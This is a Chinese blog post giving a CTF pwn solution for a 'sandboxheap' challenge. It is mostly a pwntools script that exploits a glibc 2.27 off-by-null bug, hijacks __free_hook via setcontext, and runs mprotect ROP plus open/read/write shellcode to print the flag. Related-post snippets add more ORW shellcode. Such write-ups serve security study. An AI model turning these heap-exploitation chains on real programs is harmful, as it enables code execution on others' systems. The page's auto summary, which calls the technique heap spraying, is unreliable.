2.27 off by null +orw

原创 已于 2022-11-12 20:02:50 修改 · 155 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2022-11-07 21:04:10 首次发布
本文介绍了一种利用堆喷射技术绕过Sandbox限制的方法,通过精心构造payload来控制内存分配流程,最终实现对目标进程的任意代码执行。具体步骤包括:创建可控大小的chunk、修改__malloc_hook指针、设置__free_hook指向setcontext函数等。 
from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './sandboxheap'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

# context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote()
else:
    #r = process(argv = ['./sandbox', file_name])
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)
    pause()
def decode(x):
 return bin(x)[2:].rjust(64)[::-1]

menu = 'Your choice: '

def add(index, size):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Index: ', str(index))
    r.sendlineafter('Size: ', str(size))

def edit(index, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index: ', str(index))
    r.sendafter('Content: ', content)

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Index: ', str(index))

def delete(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Index: ', str(index))

for i in range(7):
    add(i, 0xf8)    #0 - 6

add(7, 0xf8)
add(8, 0x88)
add(9, 0xf8)
add(10, 0x10)

for i in range(8):
    delete(i)

edit(8, '1' * 0x80 * 8 + decode(0x190) + '\x00')

delete(9)

for i in range(7):
    add(i, 0xf8)

add(7, 0xf8)

show(8)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
li('malloc_hook = ' + hex(malloc_hook))
libc = ELF('./libc-2.27.so')

libc_base = malloc_hook - libc.sym['__malloc_hook']
li('libc_base = ' + hex(libc_base))

free_hook = libc_base + libc.sym['__free_hook']
li('free_hook = ' + hex(free_hook))

setcontext = libc_base + libc.sym['setcontext'] + 53
li('setcontext = ' + hex(setcontext))

add(11, 0xf8)
delete(8)

edit(11, decode(free_hook))
add(8, 0xf8)
add(12, 0xf8)

edit(12, decode(setcontext))
# dbg()
syscall=libc_base+libc.search(asm("syscall\nret")).__next__()
li('syscall = ' + hex(syscall))

add(13, 0xf8)

rsp = free_hook&0xfffffffffffff000
rsi = rsp
p1 = decode(0) * 14
p1 += decode(rsi) + decode(0) * 2 + decode(0x2000) + decode(0) * 2
p1 += decode(rsp)
p1 += decode(syscall)
dbg()
edit(13, p1)
# dbg()
delete(13)
# dbg()

layout = [
    libc_base+libc.search(asm("pop rdi\nret")).__next__(), #: pop rdi; ret;
    free_hook & 0xfffffffffffff000,
    libc_base+libc.search(asm("pop rsi\nret")).__next__(), #: pop rsi; ret;
    0x2000,
    libc_base+libc.search(asm("pop rdx\nret")).__next__(), #: pop rdx; ret;
    7,
    libc_base+libc.search(asm("pop rax\nret")).__next__(), #: pop rax; ret;
    10,
    syscall, #: syscall; ret;
    libc_base+libc.search(asm("jmp rsp")).__next__(), #: jmp rsp;
]

shellcode = asm('''
sub rsp, 0x800
push 0x67616c66 
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall

cmp eax, 0
js failed

mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall

mov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscall

jmp exit

failed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall

exit:
xor edi, edi
mov eax, 231
syscall
''')

r.send(flat(layout) + shellcode)

r.interactive()

参考链接

pwn学习笔记(8)--初识Pwn沙箱
qq_66013948的博客
08-06 1792
​ 沙箱机制,英文sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。​ 安全计算模式seccomp(Secure Computing Mode)在Linux2.6.10之后引入到kernel的特性,可用其实现一个沙箱环境。使用seccomp模式可以定义系统调用白名单和黑名单。seccomp机制用于限制应用程序可以使用的系统调用,增加系统的安全性。​ 在ctf中主要通过两种方
BUUCTF-PWN-pwnable_asm-Sandbox
Rt1Text的博客
07-21 422
检查允许的系统调用orw是允许的,用open()打开flag文件,通过read()和write()读取并输出。
祥云杯2022 pwn - sandboxheap
z1r0的博客
11-02 545
上了sandbox,需要逆一下,在0x2710这里的功能就是允许mport和orw,所以在上面第一次exp的基础上还要再加上一个。下面的exp是笔者第一次直接打sandboxheap的,可以实现orw,然后第二个exp是打题目的,因为题目上了sandbox。这里笔者没有使用SigreturnFrame,直接看的setcontext + 53的汇编然后自己写了一下布局。其实就是一个2.27下的orw,直接拿板子套,直接参考的这位。在上一个heap基础上加了一个沙箱。的2.27下的orw
pwn——沙箱机制
djhtdjdywgjc的博客
11-20 2480
pwn沙箱
[祥云杯 2022] bitheap,sandboxheap复现
weixin_52640415的博客
11-04 446
sandbox setcontext ->mprotect ->shellcode32
setcontext+orw
「 虚幻私塾」
01-27 938
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 setcontext+orw 大致可以把2.272.29做为两个分界点。 我们先来讨论 2.27 及以下的 setcontext + orw 的写法。 首先 setcontext 是什么?了解过 SROP 的师傅应该知道 pwntools 自带了一款可以控制寄存器值的工具。模
【CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3
arttnba3的博客
02-25 6557
【CTF资料-0x0002】简易Linux堆利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
【CTF题解NO.00002】minilCTF 2020 - write up by arttnba3
arttnba3的博客
08-18 1116
【CTF题解NO.00002】minilCTF 2020 - write up by arttnba30x00.绪论0x01.Sign inStarting Point0x02.PWNhelloret2text执行过程:ret2shellcode修正过程:高阶解法:栈迁移ezsc程序分析Alphanumeric Shelllcodeeasycpp程序分析Use After Freenoleakpwnchroottime_management 0x00.绪论 mini-LCTF,前身是makerCTF,是西电
强网杯2021 pwn writeup by syclover
qq_51868336的博客
06-15 1007
no_output 首先是利用strcpy把fd给覆盖为0 然后read hello_boy 通过检测 接着触发算数运算错误 就能进入栈溢出函数 最后就是直接用32位ret2dlresolve的模板了 from pwn import * arch = 32 challenge = "./test" local = int(sys.argv[1]) context(log_level = "debug",os = "linux") if local: r = process(chal
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1719
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
PWN-Sandbox 介绍
m0_57836225的博客
11-19 1091
利用内核漏洞如果操作系统内核存在漏洞,攻击者可能利用这些漏洞突破 Sandbox 的限制。例如,在某些情况下,内核中的权限检查代码可能存在逻辑错误,攻击者可以通过精心构造的输入触发该漏洞,从而提升在 Sandbox 中的权限,使其能够访问更多系统资源或者执行被禁止的操作。资源耗尽攻击针对 Sandbox 对资源的限制,攻击者可能尝试进行资源耗尽攻击。
zctf-2017-pwn-sandbox
weixin_30907935的博客
03-12 567
才接触二进制不久,第一次写博客,萌新一只,zctf被表哥们虐得体无完肤,只能坐等writeup,最近参考flappypig的writeup研究sandbox这道题目,用了三天,记录一下。 ps:基础太渣,可能有理解错误的地方,大佬莫笑,麻烦大佬在评论中指出。。。 接下来进入正题 这道题有两个二进制文件:sandbox和vul。用sandbox运行vul程序,其中vul程序存在栈溢出...
沙箱pwn
s_hiy_iyi的博客
03-24 611
BPF_LD:加载操作,BPF_H表示按照字节传送,BPF_W表示按照双字来传送,BPF_B表示传送单个字节。BPF_LDX:从内存中加载byte/half-word/word/double-word。BPF_ST,BPF_STX:存储操作BPF_ALU,BPT_ALU64:逻辑操作运算。BPT_JMP:跳转操作,可以和JGE,JGT,JEQ,JSET一起表示有条件的跳转,和BPF_JA一起表示没有条件的跳转。
pwn -- 沙盒机制详解
lifanxin的博客
05-13 6930
沙盒机制详解概述开启沙盒的两种方式prctl函数调用seccomp库函数使用seccomp-tools识别沙盒两道例题pwnable_asm参考博客总结 概述   沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。   在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只
pwnablekr-asm-seccomp-sandbox
Starr
03-21 1827
文章目录1. 基本信息反汇编流程梳理2. 相关知识seccomp3. exp4. 源码5. 参考文章 1. 基本信息 file: $ file asm asm: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7401f94b1d6bf6a5afe4b
Python沙箱?不存在的
jmp esp
07-07 872
http://bobao.360.cn/learning/detail/4059.html
DEFCON CTF Finals 2023 - pwn-sandbox: 内核沙箱逃逸与UAF漏洞深度剖析
2402_86373248的博客
06-13 1140
内核堆风水布局:通过eBPF程序实现精确堆喷跨态攻击链设计:用户态到内核态的上下文切换控制现代缓解绕过:结合KGDB调试实现KASLR实时解析。
PWN -特殊情况下 Sandbox 的 Bypass
m0_57836225的博客
11-19 716
Sandbox 虽然是一种强大的安全机制,但在某些特殊情况下,仍然可能被攻击者绕过其限制。这通常需要攻击者利用系统或 Sandbox 自身的漏洞、配置错误或者设计缺陷等。理解这些特殊情况对于全面评估系统安全以及进行有效的安全防御至关重要。
JS 构建沙箱环境sandbox
赵泽清的博客
03-22 2753
市面上现在流行两种沙箱模式,一种是使用iframe,还有一种是直接在页面上使用new Function + eval进行执行。 殊途同归,主要还是防止一些Hacker们 吃饱了没事干,收别人钱来 Hack 你的网站。 一般情况, 我们的代码量有60%业务+40%安全. 剩下的就看天意了。接下来,我们来一步一步分析,如果做到在前端的沙箱.文末 看俺有没有心情放一个彩蛋吧。直接嵌套这种方式说起来并不是什么特别好的点子,因为需要花费比较多的精力在安全性上. eval执行最简单的方式,就是使用eval进行代码的执行
PWN题型中ORW怎么解
最新发布
11-14
PWN题型中ORW(Open - Read - Write)的解题方法通常围绕实现文件的打开、读取和写入操作来获取flag等关键信息,以下是具体的方法: ### 构造ORW Shellcode 构造ORW shellcode是常见的解题思路,通过汇编代码实现系统调用完成文件的打开、读取和写入。以64位系统为例,示例代码如下: ```python from pwn import * context(os='linux', arch='amd64') shellcode = ''' xor rax, rax # xor rax,rax是对rax的清零运算操作 xor rdi, rdi # 清空rdi寄存器的值 xor rsi, rsi # 清空rsi寄存器的值 xor rdx, rdx mov rax, 2 # open调用号为2 mov rdi, 0x67616c662f2e # 为galf/../flag的相反 0x67616c662f2e为/flag的ASCII码的十六进制 push rdi mov rdi, rsp syscall # 系统调用前,linux在eax寄存器里写入子功能号,断止处理程序根据eax寄存器的值来判断用户进程申请哪类系统调用 mov rdx, 0x100 # sys_read(3,file,0x100) mov rsi, rdi mov rdi, rax mov rax, 0 # read调用号为0,0为文件描述符,即外部输入,例如键盘 syscall mov rdi, 1 # sys_write(1,file,0x30) mov rax, 1 # write调用号为1,1为文件描述符,指的是屏幕 syscall ''' ``` 在这个shellcode中,首先将`rax`、`rdi`、`rsi`、`rdx`寄存器清零,然后设置`rax`为2(`open`系统调用号),将文件路径的十六进制表示压入栈中并将栈顶地址赋给`rdi`,执行`syscall`打开文件。接着设置`rdx`为读取的字节数,`rsi`为读取缓冲区地址,`rdi`为文件描述符,`rax`为0(`read`系统调用号),执行`syscall`读取文件内容。最后设置`rdi`为1(标准输出文件描述符),`rax`为1(`write`系统调用号),执行`syscall`将读取的内容输出到屏幕[^3]。 ### 利用ROP链 当程序和libc里找不到`/flag\x00`或者`flag\x00`字符串时,可以利用ROP链结合`mprotect`系统函数修改内存段的权限,将ORW shellcode写入可执行的内存段并执行。示例代码如下: ```python from pwn import * p = process('./pwn') elf = ELF('./pwn') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') rsi = 0x000000000002be51 + libc.address rdx_r12 = 0x000000000011f2e7 + libc.address bss = elf.bss() + 0x300 seg = bss & (~0xfff) log("RWX_seg", seg) mprotect = libc.sym["mprotect"] read = libc.sym["read"] pl2 = cyclic(64) + flat(0, rdi_ret, seg, rsi, 0x1000, rdx_r12, 7, 0, mprotect, rdi_ret, 0, rsi, bss, rdx_r12, 0x100, 0, read, bss) sla("How to get flag?\n", pl2) pause() sl(asm(shellcraft.cat("flag"))) ``` 在这个示例中,通过计算`bss`段的地址,利用`mprotect`函数将其权限修改为可读可写可执行(RWX),然后使用`read`函数将ORW shellcode写入`bss`段,最后执行该shellcode获取flag[^2]。 ### 结合漏洞利用 在实际解题中,需要结合具体的漏洞,如缓冲区溢出、格式化字符串漏洞等,将构造好的ORW shellcode或ROP链注入到程序中执行。例如,在存在缓冲区溢出漏洞的程序中,可以通过输入超长字符串覆盖返回地址,将其指向构造好的ORW代码的起始地址,从而触发执行。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值